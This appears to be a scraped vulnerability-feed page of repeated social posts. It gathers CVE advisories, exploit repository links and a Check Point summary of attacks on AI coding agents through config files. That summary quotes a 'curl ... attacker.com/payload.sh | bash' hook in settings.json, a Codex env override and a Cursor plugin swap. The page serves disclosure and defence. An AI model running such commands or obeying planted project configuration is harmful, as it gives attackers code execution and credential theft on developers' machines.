Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##updated 2025-11-24T17:38:57
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2025-11-06T14:51:19.950000
1 posts
📰 CISA Discovers 'FIRESTARTER' Backdoor on Federal Cisco Firewall; Malware Survives Patches
🔥 CISA finds new 'FIRESTARTER' backdoor on a federal agency's Cisco firewall. The malware survives patches and firmware updates, allowing persistent access. Exploited CVE-2025-20333 & CVE-2025-20362. #CyberSecurity #CISA #Backdoor #Cisco
##updated 2025-11-04T22:16:17.823000
2 posts
1 repos
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2025-10-28T13:58:58.610000
1 posts
📰 CISA Discovers 'FIRESTARTER' Backdoor on Federal Cisco Firewall; Malware Survives Patches
🔥 CISA finds new 'FIRESTARTER' backdoor on a federal agency's Cisco firewall. The malware survives patches and firmware updates, allowing persistent access. Exploited CVE-2025-20333 & CVE-2025-20362. #CyberSecurity #CISA #Backdoor #Cisco
##updated 2025-10-23T12:46:37.910000
2 posts
4 repos
https://github.com/NetVanguard-cmd/CVE-2025-59536
https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC
----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##updated 2025-10-22T00:33:00
1 posts
35 repos
https://github.com/PolarisXSec/CVE-2024-21413
https://github.com/D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB
https://github.com/bhatbhupendra/Moniker-Link--CVE-2024-21413-
https://github.com/Heera-V/CVE2024-21413
https://github.com/MSeymenD/CVE-2024-21413
https://github.com/SallocinAvalcante/lab-SMB-responder-CVE-2024-21413
https://github.com/hau2212/Moniker-Link-CVE-2024-21413-
https://github.com/eylommaayan/THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-
https://github.com/dshabani96/CVE-2024-21413
https://github.com/KartheekKandalam99/SVPT_CW_2
https://github.com/CMNatic/CVE-2024-21413
https://github.com/E-m-e-k-a/Moniker-Link-Lab-Setup
https://github.com/th3Hellion/CVE-2024-21413
https://github.com/MQKGitHub/Moniker-Link-CVE-2024-21413
https://github.com/duy-31/CVE-2024-21413
https://github.com/mmathivanan17/CVE-2024-21413
https://github.com/yass2400012/Email-exploit-Moniker-Link-CVE-2024-21413-
https://github.com/ViniciusFariasDev/cve-2024-21413-outlook-monikerlink-lab
https://github.com/olebris/CVE-2024-21413
https://github.com/securenetexpert/CVE-2024-21413-Moniker-Link-Writeup
https://github.com/ShubhamKanhere307/CVE-2024-21413
https://github.com/dionissh/CVE-2024-21413
https://github.com/TheMursalin/HTB-Mailing-A-Complete-Walkthrough
https://github.com/ThemeHackers/CVE-2024-21413
https://github.com/Cyber-Trambon/CVE-2024-21413-exploit
https://github.com/pedro-lucas-melo/Estudo-de-Caso-CVE-2024-21413
https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
CVE-2024-21413 (CVSS 9.8) is actively exploited and bypasses Outlook Protected View to enable remote code execution and NTLM hash theft. Here’s the enterprise risk breakdown, detection strategy, and mitigation roadmap security leaders need now.
##updated 2025-08-25T01:41:36.580000
2 posts
1 repos
----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##updated 2025-06-23T18:54:52.400000
1 posts
3 repos
https://github.com/Crystallen1/CVE-2025-27636-demo
https://github.com/enochgitgamefied/CVE-2025-27636-Practical-Lab
🔴 CVE-2026-40453 - Critical (9.9)
The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was no...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40453/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2025-02-11T19:03:55
1 posts
🔴 CVE-2026-41409 - Critical (9.8)
The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been exec...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41409/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2024-11-21T06:49:53.140000
1 posts
Just an update on the IObit Advanced SystemCare zero-day I posted about a couple days ago. I mentioned in that post VulDB marked it as a duplicate of CVE-2022-24138 and while I agree with the root cause analysis being the same (ProgramData permission issues) the actual exploit chain is quite different. I found a named pipe that lets a low-priv user trigger a SYSTEM integrity file write on-demand. Since IObit has a concrete history of not replying to researchers and history repeats, here is the full write-up:
https://github.com/usernameone101/Writeups/blob/main/IObit%20Zero%20Day%20(Updated%20v2).pdf
#zeroday #infosec #cybersec #cybersecurity #bug #vulnerability
##CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig
Read on HackerWorkspace: https://hackerworkspace.com/article/cve-2026-42208-targeted-sql-injection-against-litellm-s-authentication-path-discovered-36-hours-following-vulnerability-disclosure-sysdig
##CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig
Read on HackerWorkspace: https://hackerworkspace.com/article/cve-2026-42208-targeted-sql-injection-against-litellm-s-authentication-path-discovered-36-hours-following-vulnerability-disclosure-sysdig
##⚪️ Kaspersky Lab experts discover vulnerability in Snapdragon chipsets
🗨️ Experts from Kaspersky ICS CERT have discovered a vulnerability in Qualcomm Snapdragon chipsets. The issue was found in the BootROM boot firmware, which is embedded at the hardware level. Chipsets from these series are widely used in smartphones, tablets, automotive…
##